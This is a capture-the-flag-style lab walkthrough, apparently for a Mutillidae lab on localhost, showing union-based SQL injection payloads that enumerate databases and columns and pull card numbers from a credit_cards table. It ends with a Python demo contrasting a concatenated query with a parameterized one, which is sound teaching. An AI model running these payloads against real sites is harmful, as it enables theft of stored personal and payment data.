# Pivoting with SQL injection

## Lab 10: SQL Injection - Pivoting with SQL injection

<figure><img src="https://677614291-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FrRWtuMw6xkkeDjZfkcWC%2Fuploads%2F9TRE88RYQbkm9y6BQVEg%2Fimage.png?alt=media&#x26;token=cb7f23f8-09ad-43ad-9baa-af48a2e2de73" alt=""><figcaption></figcaption></figure>

Go to the User Lookup page: <http://127.0.0.1/index.php?page=user-info.php>

We already know that there are 10 columns, so we can use the UNION operator to perform a union-based SQLi and try several possible table names related to credit cards, such as creditcard, credit\_card, etc. The name goes in the FROM clause, so it is a table name rather than a column name.

Payload -> `' UNION SELECT 1,2,3,4,5,6,7,8,9,1 FROM <table_name> --`

<figure><img src="https://677614291-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FrRWtuMw6xkkeDjZfkcWC%2Fuploads%2FF64qFGA9Tkwcq5P29WD5%2Fimage.png?alt=media&#x26;token=7cb214a4-25b3-456d-9338-2c57bc2d1619" alt=""><figcaption></figcaption></figure>

For the 'creditcard' table name we get an error, so it is not the correct answer.

The right table name is 'credit\_cards': `' UNION SELECT 1,2,3,4,5,6,7,8,9,10 FROM credit_cards --`

<figure><img src="https://677614291-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FrRWtuMw6xkkeDjZfkcWC%2Fuploads%2FT4XBCgqi4dDztoPJb1HD%2Fimage.png?alt=media&#x26;token=9297d902-ca7d-40ac-925d-95fbaf487457" alt=""><figcaption></figcaption></figure>

Great. We can now retrieve information about the DB type and version (the answer to lab 11) using this query:

`' UNION SELECT 1, database(),version(),user(),5,6,7,8,9,10--`

<figure><img src="https://677614291-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FrRWtuMw6xkkeDjZfkcWC%2Fuploads%2FtSZlfZnBIvQPH0lc1fab%2Fimage.png?alt=media&#x26;token=c546dfd6-2989-44c7-a7c8-cb0cc9607a75" alt=""><figcaption></figcaption></figure>

We can also discover all installed DBs using the following query:

`' UNION SELECT 1,schema_name,3,4,5,6,7,8,9,10 from INFORMATION_SCHEMA.SCHEMATA--`

<figure><img src="https://677614291-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FrRWtuMw6xkkeDjZfkcWC%2Fuploads%2Fg89mMzc7QCY7pcc3lZZP%2Fimage.png?alt=media&#x26;token=c4d2f83f-ca61-410c-9a43-7879f90f6e95" alt=""><figcaption></figcaption></figure>

Great. At this point we need to find out which DB describes the credit\_cards table and which columns that table has:

`' UNION SELECT 1,COLUMN_NAME,TABLE_NAME,4,5,6,7,8,9,10 TABLE_SCHEMA FROM <db_name>.COLUMNS WHERE table_name='credit_cards'--`

In this case the first value, 'information\_schema', is the db\_name:

`' UNION SELECT 1,COLUMN_NAME,TABLE_NAME,4,5,6,7,8,9,10 TABLE_SCHEMA FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name='credit_cards'--`

<figure><img src="https://677614291-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FrRWtuMw6xkkeDjZfkcWC%2Fuploads%2FTW7Gz8eg8fpSVFiPM2uD%2Fimage.png?alt=media&#x26;token=fa797141-eed9-445f-ad3f-b26bd55697bd" alt=""><figcaption></figcaption></figure>

The results give us more information about the columns. In this case we only need ccnumber:

`' UNION SELECT 1,ccid,ccnumber,4,5,6,7,8,9,10 FROM credit_cards--`

<figure><img src="https://677614291-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FrRWtuMw6xkkeDjZfkcWC%2Fuploads%2FKw1BZdeP9s2pzkMAi0k4%2Fimage.png?alt=media&#x26;token=2f02b532-f93d-41bf-8d9c-f46adbb79c0f" alt=""><figcaption></figcaption></figure>

We obtain the ccnumber (the last one in the screenshot), which is our answer!
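
Every payload above works because the lookup query is built by concatenating user input into the SQL text. The following is an added example (not part of the original writeup and not Mutillidae's own code) that replays the walkthrough's final payload against a concatenated query and a parameterized one. It assumes an in-memory SQLite database standing in for MySQL, with a constructed 10-column `accounts` table and constructed test card values.

```python
import sqlite3

# Payload quoted from the final step of the walkthrough above.
PAYLOAD = "' UNION SELECT 1,ccid,ccnumber,4,5,6,7,8,9,10 FROM credit_cards--"

def make_db():
    """Constructed stand-in schema: 10-column accounts table plus credit_cards."""
    db = sqlite3.connect(":memory:")
    extra = ", ".join(f"c{i} TEXT" for i in range(4, 11))  # pad to 10 columns
    db.execute(f"CREATE TABLE accounts (cid INTEGER, username TEXT, password TEXT, {extra})")
    db.execute("CREATE TABLE credit_cards (ccid INTEGER, ccnumber TEXT)")
    db.execute("INSERT INTO accounts (cid, username, password) VALUES (1, 'alice', 'pw')")
    db.executemany("INSERT INTO credit_cards VALUES (?, ?)",
                   [(1, "4111-TEST-0001"), (2, "4111-TEST-0002")])  # constructed values
    return db

def lookup_vulnerable(db, username, password):
    # Input is concatenated into the SQL text, so a quote in `username`
    # closes the string literal and the remainder is parsed as SQL.
    sql = ("SELECT * FROM accounts WHERE username='" + username +
           "' AND password='" + password + "'")
    return db.execute(sql).fetchall()

def lookup_parameterized(db, username, password):
    # Placeholders pass the input as bound values; it is never parsed as SQL.
    sql = "SELECT * FROM accounts WHERE username=? AND password=?"
    return db.execute(sql, (username, password)).fetchall()

def leaked_card_numbers(rows):
    # The payload places ccnumber in the third column (index 2) of each row.
    return sorted(r[2] for r in rows if str(r[2]).startswith("4111-TEST"))

if __name__ == "__main__":
    db = make_db()
    print("concatenated :", leaked_card_numbers(lookup_vulnerable(db, PAYLOAD, "")))
    print("parameterized:", leaked_card_numbers(lookup_parameterized(db, PAYLOAD, "")))
    print("normal lookup:", lookup_parameterized(db, "alice", "pw"))
```

With bound parameters the payload is compared as a literal username, matches no account, and the legitimate lookup still returns its row.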


